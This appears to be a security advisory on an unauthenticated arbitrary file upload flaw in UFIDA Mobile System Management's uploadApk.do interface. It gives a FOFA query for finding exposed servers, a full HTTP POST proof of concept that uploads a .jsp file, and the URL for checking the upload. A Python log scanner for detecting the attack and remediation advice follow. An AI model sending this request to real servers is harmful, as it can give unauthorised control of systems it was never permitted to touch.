0x01 Product Introduction
UFIDA Mobile System Management is a mobile office solution from UFIDA (Yonyou) that helps enterprises move to mobile working, improve management efficiency and give staff more flexibility in how they work. It provides a set of functions and tools that let users manage and process enterprise systems and business on mobile devices.
0x02 Vulnerability Overview
The uploadApk.do interface of the UFIDA Mobile System Management system has an arbitrary file upload vulnerability. An unauthenticated attacker can upload arbitrary files through this interface and ultimately gain control of the server.
0x03 Reproduction Environment
FOFA: app="Yonyou-Mobile System Management"
0x04 Vulnerability Reproduction
PoC
POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3

------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"
Content-Type: application/msword

hello
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--
Note: the response must return status code 2; any other status code means the upload did not succeed.
Verification URL
http://your-ip/maupload/apk/a.jsp
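As an added example, not part of the original advisory, the following Python script scans web-server access-log lines for the two traces this PoC leaves behind: a POST to the uploadApk.do interface and a later request for a server-side script under /maupload/apk/. The combined log format, sample IPs and timestamps are constructed assumptions.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Sep/2023:10:01:02 +0800] "POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1" 200 57 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Sep/2023:10:01:05 +0800] "GET /maupload/apk/a.jsp HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Sep/2023:10:02:00 +0800] "GET /maportal/login.do HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Sep/2023:10:03:00 +0800] "GET /maupload/apk/app.apk HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

UPLOAD_ENDPOINT = "/maportal/appmanager/uploadapk.do"  # compared case-insensitively
UPLOAD_DIR = "/maupload/apk/"
# Only APK packages belong here; a server-side script under this path is an indicator.
SCRIPT_EXTS = (".jsp", ".jspx")

def scan_access_log(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per request matching either indicator, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        path = m.group("path").split("?", 1)[0].lower()
        reason = None
        if m.group("method") == "POST" and path == UPLOAD_ENDPOINT:
            reason = "upload to uploadApk.do (unauthenticated interface)"
        elif path.startswith(UPLOAD_DIR) and path.endswith(SCRIPT_EXTS):
            reason = "script file requested from upload directory"
        if reason:
            findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "path": m.group("path"), "status": m.group("status"),
                             "reason": reason})
    return findings

def suspicious_ips(log_text: str) -> set:
    """IPs that both posted to uploadApk.do and fetched a script from the upload dir."""
    uploaders, fetchers = set(), set()
    for f in scan_access_log(log_text):
        (uploaders if f["reason"].startswith("upload") else fetchers).add(f["ip"])
    return uploaders & fetchers

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["ip"], f["time"], f["reason"], f["path"])
```

A hit from suspicious_ips is the strongest signal, since it pairs the upload with the follow-up access to the written file; a lone POST to the interface still deserves review on an instance that is reachable from the Internet.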
0x05 Remediation Suggestions
Remove the system from the Internet-exposed surface, or restrict access permissions on the interface.
Upgrade to a patched version.